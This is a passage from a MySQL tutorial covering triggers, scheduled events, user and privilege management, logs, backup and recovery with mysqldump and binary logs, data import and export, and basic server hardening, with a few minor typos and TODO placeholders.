+----------+-----------+----------+---------------------+
| personID | firstName | lastName | datetimeDeleted     |
+----------+-----------+----------+---------------------+
|        2 | Peter     | Johonson | 2012-10-26 18:06:09 |
+----------+-----------+----------+---------------------+
Example (Created and Last-Updated)
DROP TABLE timestamp_trigger_arena;
CREATE TABLE timestamp_trigger_arena (
   `desc`        VARCHAR(20),
   created       TIMESTAMP DEFAULT 0,
   last_updated  TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
);
 
CREATE TRIGGER created_trigger
BEFORE INSERT ON timestamp_trigger_arena FOR EACH ROW
   SET NEW.created = NOW();
   -- NEW is an alias referring to the columns to be inserted or updated.
   -- Need to set NEW.columnName BEFORE insert.
 
INSERT INTO timestamp_trigger_arena (`desc`) VALUE ('Created');
SELECT * FROM timestamp_trigger_arena;
UPDATE timestamp_trigger_arena SET `desc`='Updated' WHERE `desc`='Created';
SELECT * FROM timestamp_trigger_arena;

Events

An event is a set of stored SQL statements that get executed at the scheduled date and time. Once an event is completed, it will be dropped automatically.

Syntax:

CREATE EVENT eventName ON SCHEDULE 
AT timestamp [+ INTERVAL intervalNumber intervalUnit]
DO 
statements

The schedule is defined in "AT timestamp" (e.g., AT now(), AT '2011-01-01 00:00:00'). You could specify a relative time with the optional "+ INTERVAL", (e.g., AT now() + 1 HOUR).

You need to enable the event scheduler, which is a special thread for maintaining the event queue and running scheduled events:

-- Enable Event Scheduler thread
mysql> SET @@global.event_scheduler = ON;
   
-- Show the current processing threads
mysql> SHOW PROCESSLIST \G
*************************** 1. row ***************************
     Id: 1
   ......
   Info: SHOW PROCESSLIST
*************************** 2. row ***************************
     Id: 2
   User: event_scheduler
   Host: localhost
     db: NULL
Command: Daemon
   Time: 329
  State: Waiting on empty queue
   Info: NULL

You can also start the server mysqld with option --event-scheduler=DISABLED|ENABLED.

Example:

mysql> SELECT * FROM products WHERE productCode LIKE 'PIL%';
+-------------+-----------+-------------+-----------+--------------+
| productCode | name      | description | unitPrice | unitsInStock |
+-------------+-----------+-------------+-----------+--------------+
| PIL-0001    | Pencil 2B | 2B Pencil   |      0.54 |         2000 |
+-------------+-----------+-------------+-----------+--------------+
   
-- Check whether event scheduler is enabled
mysql> SELECT @@global.event_scheduler;
+--------------------------+
| @@global.event_scheduler |
+--------------------------+
| OFF                      |
+--------------------------+
   
-- Enable event scheduler
mysql> SET @@global.event_scheduler = ON;
-- In mysqld console --
100426 21:58:20 [Note] Event Scheduler: scheduler thread started with id 2
   
-- Schedule an event to increase the price by 10% for some products
mysql> CREATE EVENT testEvent
   ON SCHEDULE AT CURRENT_TIMESTAMP + INTERVAL 30 SECOND
   DO
      UPDATE products SET unitPrice = unitPrice * 1.1 WHERE productCode LIKE 'PIL%';

mysql> SHOW EVENTS \G
*************************** 1. row ***************************
                  Db: southwind_mini
                Name: testEvent
             Definer: myuser@localhost
           Time zone: SYSTEM
                Type: ONE TIME
          Execute at: 2010-04-26 21:49:21
      Interval value: NULL
      Interval field: NULL
              Starts: NULL
                Ends: NULL
              Status: ENABLED
          Originator: 0
character_set_client: latin1
collation_connection: latin1_swedish_ci
  Database Collation: utf8_unicode_ci
1 row in set (0.03 sec)
   
-- 30 seconds later, in mysqld console --
100426 21:59:05 [Note] Event Scheduler: Last execution of southwind_mini.testEvent. Dropping.
100426 21:59:05 [Note] Event Scheduler: Dropping southwind_mini.testEvent
100426 21:59:05 [Note] Event Scheduler: [myuser@localhost][southwind_mini.testEvent] 
   Data truncated for column 'unitPrice' at row 0
   
mysql> SHOW EVENTS \G
Empty set (0.04 sec)
   
mysql> SELECT * FROM products WHERE productCode LIKE 'PIL%';
+-------------+-----------+-------------+-----------+--------------+
| productCode | name      | description | unitPrice | unitsInStock |
+-------------+-----------+-------------+-----------+--------------+
| PIL-0001    | Pencil 2B | 2B Pencil   |      0.59 |         2000 |
+-------------+-----------+-------------+-----------+--------------+

An event can also be recurring:

CREATE EVENT eventName ON SCHEDULE 
EVERY intervalNumber intervalUnit
   [STARTS startTimestamp [+ INTERVAL count interval]]
   [ENDS endTimestamp [+ INTERVAL count interval]]
DO SQLstatements

Example:

-- Write an event to backup the Customers table daily
CREATE EVENT backupCustomers
ON SCHEDULE 
EVERY 1 DAY
STARTS NOW()
ON COMPLETION PRESERVE
COMMENT 'Daily copy of customers table to backup_customers'
DO 
......

Administering MySQL Database Server

Managing User Accounts

To create a new user, use CREATE USER command as follows:

CREATE USER 'username'[@'userhostname'] IDENTIFIED BY PASSWORD 'password';

The default userHostname is localhost. You could use either DNS hostname or IP address. Wildcard '%' and '_' can be used for userHostname, e.g., 'peter'@'%' (for all hosts), 'paul'@'*.abc.com', 'pris'@'128.1.2.%'. For IP address, a netmask can be specified in IPAddress/Netmask, e.g., '192.168.1.0/255.255.255.0'.

The new user created has no privileges. You need to grant the appropriate privilege to the user using GRANT command. Privilege can be grant globally (for all tables of all databases), or at the database-level, table-level, column-level. For example,

-- Global privileges (all tables of all databases)
-- Grant all privileges (except the GRANT privilege) on all the databases all the tables (*.*)
GRANT ALL ON *.* TO 'username'@'userhostname';
-- Grant all privileges, including GRANT privilege
GRANT ALL ON *.* TO 'username'@'userhostname' WITH GRANT OPTION;
-- Grant selected privileges on all the databases all the tables
GRANT SELECT, INSERT ON *.* TO 'username'@'userhostname';
   
-- Database-level
-- Grant selected privileges on all the tables of a particular database
GRANT SELECT, INSERT ON databaseName.* TO 'username'@'userhostname';
   
-- Table-level
-- Grant selected privileges on selected tables of a particular database
GRANT SELECT, INSERT, UPDATE, DELETE ON databaseName.table1Name, databaseName.table2Name TO 'username'@'userhostname';
   
-- Column-Level
-- Grant selected privileges on selected columns of tables of a particular database
GRANT SELECT(column1Name, column2Name), INSERT ON databaseName.tableName TO 'username'@'userhostname';

The available privileges are:

  • Object Rights: SELECT, INSERT, UPDATE, DELECT, EXECUTE, SHOW VIEW.
  • DDL Rights: CREATE, ALTER, DROP, CREATE VIEW, CREATE ROUTINE, ALTER ROUTINE, REFERENCES, INDEX, FILE.
  • Others: ALL, ALL WITH GRANT OPTION, GRANT, CREATE USER, CREATE TEMPORARY TABLES, LOCK TABLES.

To remove privileges, use REVOKE command, e.g.,

-- Remove all privileges
REVOKE ALL PRIVILEGES, GRANT OPTION FROM 'username'@'userhostname';

You may need to issue a "FLUSH PRIVILEGES" command to clear and reload temporary caches in MySQL, for the new privileges to take immediate effect.

To remove a user, use DROP USER command as follows:

DROP USER 'username'@'userhostname';

To change the password of a user, use SET PASSWORD command, e.g.,

SET PASSWORD FOR 'username'@'userhostname' = PASSWORD('newPassword');
-- For current user
SET PASSWORD = PASSWORD('newPassword');

To rename a user, use RENAME USER command, e.g.,

RENAME USER 'username'@'userhostname' TO 'newUsername'@'userhostname';
Security Considerations on User Management
  • The superuser root has no initial password. It is critical to protect superuser root with a strong password.
  • Remove the anonymous user (identified by an empty string) ''@'localhost', or ''@'127.0.0.1', which was created during the installation by default.
  • All new users must be password protected.
  • Never choose a password from dictionary. Use a combination of letters and numbers.
  • Do not grant any user (except root) access to mysql.user table (because passwords are stored in this table).
  • Do not grant more privileges than necessary. Grant the least privilege necessary to carry out the tasks.
  • Never grant privileges to all hosts.
  • Run "SHOW GRANTS [FOR 'username'@'hostname']" statement to list the privileges granted to a user (default to current user). For example,
    -- List the privilege for the current user
    mysql> SHOW GRANTS;
    -- List the privilege for another user
    mysql> SHOW GRANTS FOR 'username'@'hostname';
    You can also run the statement in batch mode with execute (-e) option:
    Shell> mysql -u username -p -e "SHOW GRANTS FOR 'selectedUser'@'hostname'"

    Alternatively, you can list the privileges (vertically) by querying the mysql.user table.

    mysql> SELECT * FROM mysql.user \G 
  • Run your database server behind a firewall (or in DMZ), and block the database server port number (default 3306) from untrusted hosts. Try "telnet databaseHostname 3306" from a remote machine to confirm that it is not opened to untrusted hosts.
  • Do not run mysqld or mysql daemon/service/program with privilege user of the system (e.g., root of Unix, administrator of Windows). Create a normal user (say mysql) to run the database server mysqld. This user requires read and write privilege to the MySQL directory and data directory.
  • MySQL supports internal SSL. Use SSL to encrypt the messages (in transit) if necessary.

Logs

MySQL maintains several logs to help you maintain your database server: Error Log, Binary Log, General Query Log, Slow Query Log. All logs, by default, are kept in the data directory.

Error Log

The error log maintains all the startup, shutdown, and critical operating error messages. Error log in enabled by default. The error log file is called "hostname.err" in the data directory. You can change the error log file via --log-error=filename mysqld startup option.

On Windows, if you use --console option, the error will be written to the stderr (which defaults to console) instead of error log file.

Binary Log

The binary log keeps all statement that changes the database, e.g., CREATE TABLE, INSERT, UPDATE, DELETE. It does not keep query statements (such as SELECT, SHOW, DESCRIBE) that does not change the database. The binary log can be used to replicate a slave backup server, or to bring a backup database up-to-date, by executing all the changes logged. To enable the binary log, start MySQL server mysqld with the --log-bin=baseName option. A number is appended behind the baseName. The server creates a new log file with the next number each time it starts or whenever the log is flushed. An index file is also created to keep track of all the binary logs.

There are three logging formats:

  • Statement-based Logging: specify via option --binlog-foramt=STATEMENT. The logged statement can be propagate to a slave or backup server.
  • Row-based Logging: specify via option --binlog-foramt=ROW. Keep track of how individual rows were changes.
  • Mixed Logging: specify via option --binlog-format=MIXED. It uses statement-based logging by default, but switch into row-based in certain cases to improve efficiency.

You can display the binary logs using the mysqlbinlog utility, which converts the log entries into SQL statements:

-- Display on console
Shell> mysqlbinlog logfile.001 [logfile.002...] | more
-- Saved in a text file
Shell> mysqlbinlog logfile.001 [logfile.002...] > "d:\path\binlog.sql"

To update a backup server, pipe the output of mysqlbinlog to a mysql client:

Shell> mysqlbinlog binaryLogFile[s] | mysql -u userName -p
General Query Log

The General Query Log maintain information about clients' connections, and all SQL statements. To enable, use mysqld startup option --general_log=filename (or --general_log with default filename of hostname.log). The log can be directed to a file (default), or a table (mysql.general_log), or both, or disabled via an additional option --log-output=FILE|TABLE|FILE,TABLE|NONE.

Slow Query Log

Keep track of SQL statement that took more than long_query_times (default of 10 seconds). You could enable via mysqld startup option --log_slow_queries=filename. Similar to General Query Log, it can be directed to a file (default), or a table (mysql.slow_log), or both, or disabled via an additional option --log-output=FILE|TABLE|FILE,TABLE|NONE.

Maintaining the Log Files

Log files grow, and need to be maintained periodically. You can remove the error log and the query logs, but not the binary log as that is used for backup and recovery.

You can issue command "FLUSH LOGS" to close and reopen all the log files. For error log, the old log file will be renamed with suffix "-old" (which could be removed) and a new file created.

For binary log, a new file with the next number will be created, when the log is flushed. For the binary log, you can set the expire_logs_days to expire binary log files automatically after a given number of days. Make sure that the replication or backup are updated before the binary log expired.

The general query log, slow query log and binary log may log statements containing password. For security consideration, there should be place in dedicated directory (e.g., "/log") with access to the database server and the administrator only.

[TODO] Script and procedure for maintaining log file, backup and recovery

Notes for InnoDB

In the data directory, ibdata1 contains your InnoDB database and ib_logfile0 and ib_logfile1 are log files for InnoDB. The two 5MB log files are used in a circular manner.

Backup and Recovery

There are two types of backups: logical backup and physical (raw) backup.

  1. Logical Backup: Save Information about the logical database structures (e.g., CREATE TABLE) and contents (e.g., INSERT). Larger output but the backup is platform-independent and portable. You can run the backup online, at the server-level (all databases), database-level (all tables of a database), or table-level (all rows and columns of a table). You can use "mysqldump" utility or "SELECT ... INTO OUTFILE" statement for backup; and "mysqlimport" utility or "LOAD DATA INFILE" statement to restore.
  2. Physical (Raw) Backup: Backup the physical files (data directory). You can simply copy the data directory (offline), or use utilities "mysqlhotcopy" (for MyISAM tables), "ibbackup" (for InnoDB tables) (online).
"mysqldump" Utility

"mysqldump" can be used to back up the entire server, selected databases, or selected tables of a database. It generates a text file of SQL statements that can later be executed to recreate the database/table and its contents.

-- Dump a particular database (all tables)
Shell> mysqldump -u username -p databaseName > backupFile.sql
-- Dump selected tables of a particular database
Shell> mysqldump -u username -p databaseName table1Name [table2Name ...] > backupFile.sql
-- Dump several databases with --database option
shell> mysqldump --databases database1Name [database2Name ...] > backupFile.sql
-- Dump all databases in the server with --all-databases option, except mysql.user table (for security)
shell> mysqldump -u root -p --all-databases --ignore-table=mysql.user > backupServer.sql

You can restore from the backup by running client "mysql" in batch mode to execute the SQL statements:

Shell> mysql -u username -p databaseName < backupFile.sql

or using the source command in an interactive client:

-- Run an mysql interactive client and load in to MySQL server
mysql> source d:/path/backupfile.sql

Example: The following command backup the table employees and customers of the database southwind_mini.

Shell> mysqldump -u username -p southwind_mini employees customers > "d:\path\backup.sql"

Study the output file, which contains CREATE TABLE and INSERT statements to recreate the tables dumped.

Incremental Backup using Binary Log

Enable the binary log, by running the server mysqld with option --log-bin=baseName.

To make an incremental-backup from the last full-backup or incremental-backup. First flush the log (FLUSH LOGS) to rotate the binary log. Then, use utility mysqlbinlog to convert the log entries to SQL statements and pipe into a mysql client.

Shell> mysqlbinlog logfile.001 [logile.002 ...] | mysql -u root -p
Backup & Recovery Strategies using mysqldump and Binary Log

InnoDB storage engine supports transaction and automatic crash recovery. Suppose that MySQL server was terminated abnormally (e.g., power failure, system crashes). Upon restart, the InnoDB engine reads its logs for pending committed and non-committed transactions. It flushes the data for those pending committed, and rollback the uncommitted transaction. It records all its actions in the error log.

However, if MySQL data disk is damaged, we need to recover the database from the latest full-backup and binary log (hopefully not damaged), a straight backup/recovery policy is needed.

Suppose that we run a full backup every Sunday at 3:00am, and incremental backup every day at 3:00pm.

  1. Enable binary log by starting the server with --log-bin=baseName option. Place the binary log at the secure and safe media (e.g., RAID disk) if available, so that it can be used in case of catastrophic disk failure.
  2. To take a full backup, run mysqldump with these options:
    Shell> mysqldump --single-transaction --flush-logs --delete-master-logs --master-data=2
                     --all-databases [--ignore-table=mysql.user] > fullbackup.sql
    • The --flush-logs option closed the current binary log, and create a new binary log using the next number. The new binary log filename is recorded in the dump (which is needed for recovery). The --delete-master-logs removes the older binary logs (as they occupy a lot of spaces). The --master-data=2 write the binary log file name and position to the dump as a comment.
    • The --single-transaction option prevent updating during the dumping operation.
    • The --all-databases --ignore-table options backup the entire server except mysql.user table for security (as it contains passwords). You may back up mysql.user if the backup files are secure. Take note that the binary log may also contain password information, and must be secured.
  3. To take an incremental-backup, issue command "FLUSH LOGS" which closes the current binary log, and create a new binary log using the next number. Copy the closed binary file to a safe media and location! You need it to run the recovery.
  4. Suppose that there is a catastrophic crash, and the MySQL data file is not usable. You may need to reformat the hard disk, re-install the operating system, re-install MySQL, and Follow this procedure to recovery the databases:
    1. Restore the full-backup.
      Shell> mysql -u root -p < fullbackup.sql
    2. Restore the incremental-backup from binary logs: Check for all the available binary logs. The last binary log at the time of crash may or may not be usable. Use the mysqlbinlog utility to process all the binary log files at once, and pipe the output SQL statement to a mysql client.
      Shell> mysqlbinlog binlog.x+0 [binlog.x+1 ...] | mysql -u root -p
    Practice the recovery procedures to create a "test" database or for development purpose.
"mysqldump" with Table Output

You can use option '--tab=filename' to direct mysqldump to backup the data in table format (instead of CREATE TABLE and INSERT statements). For example,

Shell> mysqldump -u username -p --tab="d:\path" southwind_mini employees customers

Two file are created in the specified directory for each table dumped. In our example, "employees.txt" for the data and "employees.sql" for the CREATE TABLE statement. The text file uses 'tab' as column delimiter, '\n' as the line delimiter, and '\N' for NULL.

SELECT ... INTO OUTFILE

Use for backing up the contents of a table or selected columns and rows of a table.

SELECT * INTO OUTFILE 'filename' FROM tablename
SELECT columns INTO OUTFILE 'filename' FROM tableName WHERE criteria

Example:

-- Create a test table
DROP TABLE IF EXISTS `backup_arena`;
CREATE TABLE IF NOT EXISTS `backup_arena` (
   `id` SMALLINT(5) UNSIGNED ZEROFILL AUTO_INCREMENT,
   `name` VARCHAR(10) NOT NULL,
   `price` DECIMAL(6,2) NOT NULL,
   `description` VARCHAR(50) DEFAULT NULL,
    PRIMARY KEY(`id`)
);
   
-- Populate with rows
INSERT INTO `backup_arena` VALUES 
  (NULL, 'dummy1', 1.1, NULL),
  (NULL, 'dummy2', 2.2, NULL),
  (NULL, 'dummy3', 3.3, NULL);
-- Make some changes
UPDATE `backup_arena` SET price = price * 0.9;
-- Display the table
SELECT * FROM `backup_arena`;
   
-- Export to a text file
SELECT * INTO OUTFILE 'd:/path/backup_arena.txt' FROM `backup_arena`;

The output file has no column header, uses 'tab' as column delimiter, '\n' as the line delimiter. NULL is represented as '\N', as follows:

00001	dummy1	0.99	\N
00002	dummy2	1.98	\N
00003	dummy3	2.97	\N
LOAD DATA INFILE

We can use "LOAD DATA INLINE" to import data from a text file into a database table. The default column delimiter is 'tab'; default line delimiter is '\n', and NULL is represented as '\N'. "LOAD DATA INFILE" can be used to restore data exported via "SELECT ... INTO OUTFILE".

Example: Suppose that we want to load a text file which has a different format from the table.

We shall use the same table backup_arena created earlier. The text file to be loaded is as follows. It contains a header row, two columns (name and price) need to be loaded, and two extra columns. The column delimiter is ',', line delimiter is '\r\n' (created in Windows). We also want to raise the price by 10%.

NAME,EXTRA,PRICE,ANOTHER EXTRA
pen,,1.23,---
pencil,,0.45,---
paper,,0.12,---
paper clip,,0.05,---

We could use the following LOAD DATA INLINE command:

LOAD DATA INFILE 'd:/path/loaddata_arena.txt' INTO TABLE `backup_arena`
  COLUMNS TERMINATED BY ',' 
  LINES TERMINATED BY '\r\n'
  IGNORE 1 LINES
  (name, @dummy, @oldPrice, @dummy)
  SET price = @oldPrice*1.1;

The "COLUMNS TERMINATED" and "LINES TERMINATED" clauses are used to specified the column delimiter and line delimiter, respectively. "IGNORES 1 LINES" ignores the header row of the file. The first column of the file are loaded into table columns "name". The third column of the file is assigned to a user-defined variable @oldPrice. The price column of the table is then set to @oldPrice*1.1. The other columns of the text file is assigned to an user-defined variable @dummy, which is not used and discarded.

The SELECT command confirms that the table is properly loaded:

mysql> SELECT * FROM `backup_arena`;
+-------+------------+-------+-------------+
| id    | name       | price | description |
+-------+------------+-------+-------------+
| 00001 | dummy1     |  0.99 | NULL        |
| 00002 | dummy2     |  1.98 | NULL        |
| 00003 | dummy3     |  2.97 | NULL        |
| 00004 | pen        |  1.35 | NULL        |
| 00005 | pencil     |  0.50 | NULL        |
| 00006 | paper      |  0.13 | NULL        |
| 00007 | paper clip |  0.06 | NULL        |
+-------+------------+-------+-------------+
7 rows in set (0.00 sec)
"mysqlimport" Utility

mysqlimport performs the same function as "LOAD DATA INFILE" to load data from a text file into a table. "LOAD DATA INFILE" runs inside an interactive client, whereas mysqlimport runs from command-line.

Shell> mysqlimport databaseName table1Name [table2Name ...]

For example,

Shell> mysqlimport southwind_mini customers.txt employees.txt

Load the data from "Customer.txt" into table customers, "employees.txt" into table employees of the database southwind_mini. The table name is derived from the file name by ignoring the file extension.

Security

Don't run the MySQL server as superuser root

If you run MySQL server as root, it has root privilege (e.g., can access all the files in the system). Run MySQL server as an ordinary, unprivileged user. For example, in Ubuntu, a system, unprivileged user called mysql is created to run the MySQL server.

// Check the owner of "mysql" process
$ ps aux | grep mysql
mysql  ..... /usr/sbin/mysqld

// Show user "mysql"
$ id mysql
uid=115(mysql) gid=125(mysql) groups=125(mysql)
   // user "mysql" belongs to group "mysql" only.

// Check ownerships and permissions of MySQL data directory
$ sudo ls -l /var/lib/mysql
-rw-rw---- 1 mysql mysql 18874368 Dec 19 16:11 ibdata1
-rw-rw---- 1 mysql mysql  5242880 Dec 19 17:00 ib_logfile0
-rw-rw---- 1 mysql mysql  5242880 Dec 19 17:00 ib_logfile1
drwx------ 2 mysql mysql     4096 Oct 26 21:49 mysql
drwx------ 2 mysql mysql     1024 Dec 16 03:49 test
......
   // user-owner: mysql
   // group-owner: mysql
   // Data sub-directories: list-write-access by "mysql" only.

To specify the owner of the mysql process, you need to configure /etc/mysql/my.cnf as follows:

[mysqld]
user            = mysql
datadir         = /var/lib/mysql
The MySQL data directory shall be owned and only be accessible by server's account

As seen in the above example, the data directory is only accessible by the user "mysql". Other users have no access.

[The location of the data directory is configured in the "datadir" directive of the configuration file "/etc/mysql/my.cnf" as illustrated above.]

To set the ownerships and permissions:

$ cd /path/to/MySQL-datadir
$ sudo chown -R mysql:mysql .
    // -R recursive
    
$ sudo chmod -R 700 .
    // 700 = rwx --- ---
MySQL configuration file shall be properly protected

The global configuration file /etc/mysql/my.cnf shall be owned by root, with permissions (rw- r-- r--) or 644. That is, it is writable by root (or sudo), but readable by the world (both server and client program need to read this configuration). You should be keep confidential data such as password as it is world-readable.

The local configuration files (my.cnf located at data directory) shall be owned by user "mysql" and read-write only by "mysql" (i.e, 600).

Remove the test database.

MySQL user accounts
  • Remove all anonymous account.
  • Password protect MySQL root account.
  • Grant only the necessary privileges (up to table-level or column-level) to My SQL user account. [TODO] example.
Password Policies
  • All accounts shall be password protected.
  • Password shall be stored in hash, so that even the administrator cannot see clear-text password.
  • Add a salt to the password hash, which is stored together with the password hash. Different user shall have a different salt, so that the hash is different even if the password is identical.
Backup Regularly

Use a cron job (configured in crontab)to back up the database regularly, and preferably rsync or scp to another server.

$ mysqldump -u root -p databasename > backup.sql
$ rsync -azv --rsh=ssh src dest
   // over the ssh connection

Do incremental backup. [TODO]

[TODO] Auditing

Link to MySQL References & Resources